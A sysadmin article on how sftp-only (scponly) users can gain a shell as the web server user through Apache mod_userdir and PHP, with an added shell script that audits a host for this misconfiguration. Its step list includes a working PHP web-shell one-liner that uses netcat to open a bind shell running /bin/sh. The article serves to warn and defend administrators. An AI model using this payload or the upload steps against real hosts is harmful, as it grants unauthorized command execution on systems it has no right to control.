While I am not a fan of scponly/sftp-server (OpenSSH), many people still use it to let users upload and download files to and from a host without giving them shell access. If you do a simple setup like
http://www.debian-administration.org/articles/94 or configure scponly without a chrooted environment, and you do this on a host that also runs a standard web server setup (Apache serving per-user home directories via mod_userdir, with PHP enabled), you have already lost.
The user cannot get a shell by logging in with the account you gave him, but he can now execute commands on the host through your web server. All that needs to be done is:
- Connect to the host using sftp
- sftp> mkdir public_html
- sftp> cd public_html
- sftp> put index.php
- sftp> chmod 644 index.php
- point your browser to http://host/~user/ (the request hangs while the listener runs; that is expected)
- connect netcat to host:someport
index.php would just contain something like <?php system("nc -lp someport -e /bin/sh"); ?> and you end up with a shell as www-data (on Debian). Note that -e needs a netcat build that supports it (netcat-traditional on Debian; the OpenBSD variant does not have it), and the PHP code runs with whatever the web server's user can do, not the sftp user's privileges, so the sftp account's restrictions are irrelevant from that point on.
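To check a host for exactly this combination (sftp-only users, a home directory they own or a public_html they already created, and mod_userdir enabled next to a PHP module), here is an added audit script. It is not part of the original article; it assumes Debian's /etc/apache2/mods-enabled layout and scponly-style login shells in /etc/passwd, and it builds a constructed fixture directory so it can be run offline against a root prefix instead of the live filesystem (pass an empty prefix and /etc/passwd to audit the real host).

```sh
#!/bin/sh
# Audit for the sftp-only + mod_userdir + PHP misconfiguration.
# Added example, not the article's code. Every path is relative to a
# root prefix so the functions can be pointed at a test fixture.

# Users whose login shell is scponly or an sftp-only shell; prints "user:home".
# $1: passwd file (normally /etc/passwd)
sftp_only_users() {
    awk -F: '$7 ~ /scponly|sftp/ { print $1 ":" $6 }' "$1"
}

# Owner of a path; ls is used so this works on GNU and BSD userlands alike.
owner_of() {
    ls -ld "$1" | awk '{ print $3 }'
}

# True when mod_userdir and some PHP module are both enabled.
# Assumes Debian's mods-enabled directory. $1: root prefix ("" on a live host)
userdir_php_enabled() {
    mods="$1/etc/apache2/mods-enabled"
    [ -e "$mods/userdir.load" ] || return 1
    ls "$mods"/php*.load >/dev/null 2>&1
}

# Report one user. Returns 1 (and prints a finding) when the user can serve
# files from ~/public_html, 0 otherwise.
# $1: user  $2: home as listed in passwd  $3: root prefix
check_user() {
    user=$1; home="$3$2"; dir="$home/public_html"
    if [ -d "$dir" ]; then
        n=$(find "$dir" -name '*.php' 2>/dev/null | wc -l | tr -d ' ')
        echo "$user: $dir exists, owner $(owner_of "$dir"), $n .php file(s)"
        return 1
    fi
    # No public_html yet, but the user can create one if he owns his home.
    if [ -d "$home" ] && [ "$(owner_of "$home")" = "$user" ]; then
        echo "$user: owns $home and can create public_html"
        return 1
    fi
    return 0
}

# Full audit. $1: passwd file  $2: root prefix. Returns 1 if any user is at risk.
# Assumes no whitespace in user names or home paths.
audit() {
    passwd=$1; root=$2; rc=0
    if ! userdir_php_enabled "$root"; then
        echo "mod_userdir and php are not both enabled; this path is closed"
        return 0
    fi
    for entry in $(sftp_only_users "$passwd"); do
        user=${entry%%:*}; home=${entry#*:}
        check_user "$user" "$home" "$root" || rc=1
    done
    return $rc
}

# Constructed fixture reproducing the vulnerable layout (not a real host):
# alice is scponly-only and already has a public_html with a PHP file,
# bob has a normal shell. Prints the fixture root.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/etc/apache2/mods-enabled" \
             "$root/home/alice/public_html" "$root/home/bob"
    : > "$root/etc/apache2/mods-enabled/userdir.load"
    : > "$root/etc/apache2/mods-enabled/php5.load"
    printf '<?php phpinfo(); ?>\n' > "$root/home/alice/public_html/index.php"
    printf 'alice:x:1001:1001::/home/alice:/usr/bin/scponly\n' > "$root/passwd"
    printf 'bob:x:1002:1002::/home/bob:/bin/bash\n' >> "$root/passwd"
    echo "$root"
}

# Stand-alone run against the fixture.
root=$(make_fixture)
if audit "$root/passwd" "$root"; then
    echo "no sftp-only user can serve PHP via mod_userdir"
else
    echo "at risk: an sftp-only user can run code as the web server user"
fi
rm -rf "$root"
```

The second branch of check_user is the important one in practice: a home directory owned by the sftp user is enough, because creating public_html is a single sftp command. An OpenSSH ChrootDirectory into a root-owned home (with a separate user-writable upload subdirectory) is one way to take that ability away, but only if Apache's UserDir still points at a location the user cannot write.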
It's pretty easy to make mistakes or miss important details in such a setup, and I think it is almost always a better solution either to trust people and give them access via ssh, or to give them no access at all.